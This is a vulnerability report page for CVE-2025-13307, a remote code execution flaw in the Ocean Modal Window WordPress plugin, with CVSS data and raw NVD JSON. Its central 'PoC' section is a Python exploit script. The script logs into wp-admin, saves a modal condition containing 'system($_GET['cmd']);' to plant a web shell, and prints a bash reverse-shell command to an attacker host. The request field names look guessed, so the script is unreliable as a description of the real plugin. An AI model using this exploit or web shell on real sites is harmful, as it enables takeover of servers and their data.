Security Vulnerability Report
CVE-2025-13307 CVSS 7.2 HIGH

CVE-2025-13307

Published: 2025-12-19 06:15:51
Last Modified: 2026-04-15 00:35:42

Description

The Ocean Modal Window WordPress plugin before 2.3.3 is vulnerable to Remote Code Execution via the modal display logic. These modals can be displayed under user-controlled conditions that Editors and Administrators can set (edit_pages capability). The conditions are then executed as part of an eval statement executed on every site page. This leads to remote code execution.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ocean Modal Window WordPress Plugin < 2.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13307 PoC - Ocean Modal Window RCE
# Requires WordPress Editor/Admin privileges
import requests
import re

target_url = "http://target-wordpress-site.com"
wp_admin_url = f"{target_url}/wp-admin/admin.php?page=ocean-modal-window"

# Authentication (Editor or Admin account)
session = requests.Session()
login_data = {
    'log': 'attacker_username',
    'pwd': 'attacker_password',
    'wp-submit': 'Log In',
    'redirect_to': wp_admin_url
}

# Login to WordPress
session.post(f"{target_url}/wp-login.php", data=login_data)

# Create malicious modal with RCE payload
# The payload executes system commands via eval()
rce_payload = "system($_GET['cmd']);"
modal_data = {
    'modal_title': 'Malicious Modal',
    'modal_conditions': rce_payload,  # Injected into eval()
    'modal_action': 'save'
}

# Save the malicious modal
response = session.post(wp_admin_url, data=modal_data)

# Trigger RCE by accessing any page with cmd parameter
if 'success' in response.text or response.status_code == 200:
    print("[+] Malicious modal created successfully")
    print("[+] Trigger RCE via: " + target_url + "/?cmd=whoami")
else:
    print("[-] Failed to create modal")

# Alternative: Direct command execution after modal creation
print(f"[*] Execute commands: {target_url}/?cmd=id")
print(f"[*] Reverse shell: {target_url}/?cmd=bash -i >& /dev/tcp/attacker-ip/4444 0>&1")
```

References

https://wpscan.com/vulnerability/710de342-6fb9-47bd-a40b-7b74fc3c181b/ (WPScan advisory, the reference listed in the CVE record below)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13307",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-19T06:15:50.837",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Ocean Modal Window WordPress plugin before 2.3.3 is vulnerable to Remote Code Execution via the modal display logic. These modals can be displayed under user-controlled conditions that Editors and Administrators can set (edit_pages capability). The conditions are then executed as part of an eval statement executed on every site page. This leads to remote code execution."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/710de342-6fb9-47bd-a40b-7b74fc3c181b/",
        "source": "[email protected]"
      }
    ]
  }
}
```